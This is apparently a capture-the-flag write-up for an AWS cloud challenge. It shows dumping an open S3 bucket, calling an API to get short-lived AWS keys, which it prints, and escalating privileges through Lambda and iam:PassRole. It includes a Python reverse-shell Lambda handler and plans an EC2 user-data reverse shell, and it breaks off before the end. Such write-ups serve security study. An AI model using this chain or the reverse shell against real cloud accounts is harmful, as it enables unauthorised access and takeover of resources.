We have received intelligence that Palindrome has started a global computing infrastructure to be made available to its agent to spin up C2 instances. They relied on Cloud Service Providers like AWS to provide computing resources for its agents. They have their own custom built access system e-service portal that generate short-lived credentials for their agents to use their computing infrastructure. It was said that their access system e-service was diguised as a blog site.
We need your help to access their computing resources and exfiltrate any meaningful intelligence for us.
Start here: http://d20whnyjsgpc34.cloudfront.net
NOTE: Solving challenge 4B allows you to complete level 4, but unlocks challenge 5B only!
Solution
Dumping S3 Bucket
Visiting the webpage, we see the following clues in the HTML source.
<div class="p-5 text-center bg-light">
<!-- Passcode -->
<h1 class="mb-3">Cats rule the world</h1>
<!-- Passcode -->
<!--
----- Completed -----
* Configure CloudFront to use the bucket - palindromecloudynekos as the origin
----- TODO -----
* Configure custom header referrer and enforce S3 bucket to only accept that particular header
* Secure all object access
-->
<h4 class="mb-3">—ฅ/ᐠ. ̫ .ᐟ\ฅ —</h4>
</div>
Here's what this is referring to - CloudFront is Amazon's CDN and can be configured to use an S3 bucket as its origin. The CloudFront site will then use files on the S3 buckets to serve the static page. But even so, the user could just access the S3 instance directly. The missing step here is to restrict direct access to the S3 bucket except from authenticated requests from CloudFront using Origin Access Identity (OAI).
The S3 bucket in its current state is readable by all authenticated users, so we could simply login to our own AWS account and use the AWS CLI to access the palindromecloudynekos bucket.
$ aws s3 cp s3://palindromecloudynekos . --recursive
download: s3://palindromecloudynekos/index.html to ./index.html
download: s3://palindromecloudynekos/error.html to ./error.html
download: s3://palindromecloudynekos/api/notes.txt to api/notes.txt
download: s3://palindromecloudynekos/img/photo6.jpg to img/photo6.jpg
download: s3://palindromecloudynekos/img/photo2.jpg to img/photo2.jpg
download: s3://palindromecloudynekos/img/photo4.jpg to img/photo4.jpg
download: s3://palindromecloudynekos/img/photo3.jpg to img/photo3.jpg
download: s3://palindromecloudynekos/img/photo5.jpg to img/photo5.jpg
download: s3://palindromecloudynekos/img/photo1.jpg to img/photo1.jpg
This gives us the next clue.
api/notes.txt
# Neko Access System Invocation Notes
Invoke with the passcode in the header "x-cat-header". The passcode is found on the cloudfront site, all lower caps and separated using underscore.
https://b40yqpyjb3.execute-api.ap-southeast-1.amazonaws.com/prod/agent
All EC2 computing instances should be tagged with the key: 'agent' and the value set to your username. Otherwise, the antivirus cleaner will wipe out the resources.
As we saw earlier, the passcode is X-Cat-Header: cats_rule_the_world. By sending the appropriate request to the API endpoint, we get a set of AWS credentials.
GET /prod/agent HTTP/2Host:b40yqpyjb3.execute-api.ap-southeast-1.amazonaws.comX-Cat-Header:cats_rule_the_worldHTTP/2 200 OKDate:Mon, 12 Sep 2022 14:06:30 GMTContent-Type:application/jsonContent-Length:296Access-Control-Allow-Origin:*Apigw-Requestid:YWZzigwJSQ0EPvw={"Message": "Welcome there agent! Use the credentials wisely! It should be live for the next 120 minutes! Our antivirus will wipe them out and the associated resources after the expected time usage.", "Access_Key": "AKIAQYDFBGMS7BGNBM64", "Secret_Key": "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"}
Enumerating Permissions
It was at this point that I tried different enumeration tools such as enumerate-iam and pacu. Pacu came with a ton of useful modules which came in handy later on.
A few more hours of staring at AWS documentation later, I decided to use Pacu's whoami command and surprisingly, there was a ton of useful information that Pacu has stored already.
In particular, we had lambda:CreateFunction, lambda:InvokeFunction and iam:PassRole privileges.
The reason these did not show up in enumerate-iam is probably because enumerate-iam only does a naive bruteforce by attempting to invoke each privilege without any specific format as required in this challenge (e.g. arn:aws:lambda:ap-southeast-1:051751498533:function:${aws:username}-*)
At this point we can consult this great resource by Bishop Fox that provides a nice table breakdown of different AWS privilege escalation techniques. Our current permissions correspond to technique 15 here, which involves creating a Lambda function that assumes a privileged role, thus executing code with higher privileges.
First, we create a Python script that gives us a reverse shell.
import osimport socketimport subprocessdeflambda_handler(event,context): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("HOST", PORT)) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) p = subprocess.call(["/bin/sh", "-i"])
Then we zip this into a zip file like function.zip, and create a lambda function adhering to the name format above. Using --role, we pass the lambda_agent_development_role to this lambda function.
Now that we have access to lambda_agent_development_role, let's see how we can leverage our newfound permissions. After enumerating permissions again with our trusty enumeration scripts, we find out that we now have the permission to create EC2 instances.
At this point we need to remember this piece of information given to us early in the challenge, telling us the tags that are required.
All EC2 computing instances should be tagged with the key: 'agent' and the value set to your username. Otherwise, the antivirus cleaner will wipe out the resources.
Our current permissions now correspond to technique 3 here, involving the iam:PassRole and ec2:RunInstances permissions. Essentially, we could pass in an --iam-instance-profile to assign a role to the EC2 instance.
But in order to gain access to our newfound privileges we would need a way to gain access to our newly created EC2 instance. In this article, the authors leveraged the assigning of SSH key pairs and gained access through the public IP address of the EC2 instance.
The user needs to have some way to SSH into the newly created instance.
In the example below, the user assigns a public SSH key stored in AWS to the instance and the user has access to the matching private key.
In this challenge, however, this method does not seem quite so feasible (in particular, I had a hard time figuring out how to get the public IP of the instance since we only had access to run-instances but notdescribe-instances).
It turned out there was a way to do this by using idempotency tokens, which allowed us to get updated information on the result of a previous command. As this was not my solution, I won't discuss it in detail.
Idempotency ensures that an API request completes no more than one time. With an idempotent request, if the original request completes successfully, any subsequent retries complete successfully without performing any further actions. However, the result might contain updated information, such as the current creation status.
After a bit more googling, I came across this blog post containing a similar scenario as the one we have here. It turns out that the user-data option can be used to execute a script on startup. This is meant to help perform common configuration and setup tasks when provisioning an EC2 instance.
Piecing it all together, we can modify our previous lambda function to spawn an EC2 instance that runs a reverse shell on startup.